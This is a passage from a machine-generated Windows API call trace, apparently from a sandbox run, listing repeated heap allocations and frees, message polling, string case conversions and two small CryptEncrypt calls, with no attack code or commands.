hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0208.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0208.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0208.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0208.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0208.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0208.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0208.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0208.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0208.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0208.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0208.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0208.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0208.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.219] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0208.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0208.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0208.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0208.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0208.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0208.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0208.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0208.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0208.220] CryptEncrypt (in: hKey=0xaa57e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0208.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0208.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0208.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0208.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0208.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0208.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0208.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0208.220] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0208.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0208.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0208.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0208.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0208.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0208.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0208.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0208.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0208.221] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.221] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0208.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0208.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0208.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0208.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0208.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0208.221] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0208.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0208.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0208.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0208.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0208.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0208.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0208.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0208.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0208.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0208.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0208.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0208.222] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0208.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0208.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0208.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0208.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0208.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0208.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0208.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0208.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0208.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0208.222] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0208.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0208.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0208.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0208.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0208.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0208.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0208.222] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0208.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0208.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0208.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0208.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0208.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0208.223] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0208.223] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0208.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0208.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0208.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0208.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0208.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0208.223] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0208.223] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.223] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0208.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0208.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0208.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0208.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0208.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0208.224] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0208.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0208.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0208.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0208.224] CryptEncrypt (in: hKey=0xaa57e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24b1c38*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x8 | out: pbData=0x24b1c38*, pdwDataLen=0x8bef68*=0x8) returned 1 [0208.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0208.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0208.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0208.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0208.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0208.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0208.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0208.224] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0208.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0208.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0208.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0208.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0208.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0208.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0208.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0208.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0208.225] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.225] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0208.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0208.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0208.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0208.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0208.225] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0208.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0208.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0208.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0208.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0208.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0208.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0208.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0208.225] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0208.225] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0208.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0208.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0208.226] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0208.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0208.226] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0208.226] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0208.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0208.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0208.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0208.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0208.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0208.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0208.226] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0208.226] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0208.226] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0208.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0208.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0208.226] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0208.226] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0208.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0208.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0208.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0208.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0208.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0208.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0208.227] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0208.227] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0208.227] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0208.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0208.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0208.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0208.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0208.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0208.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0208.227] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0208.227] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0208.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0208.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0208.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0208.227] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0208.227] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0208.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0208.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0208.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0208.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0208.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0208.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0208.228] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0208.228] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0208.228] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0208.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0208.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0208.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0208.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0208.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0208.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0208.228] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0208.228] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0208.228] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0208.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0208.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0208.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0208.229] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, 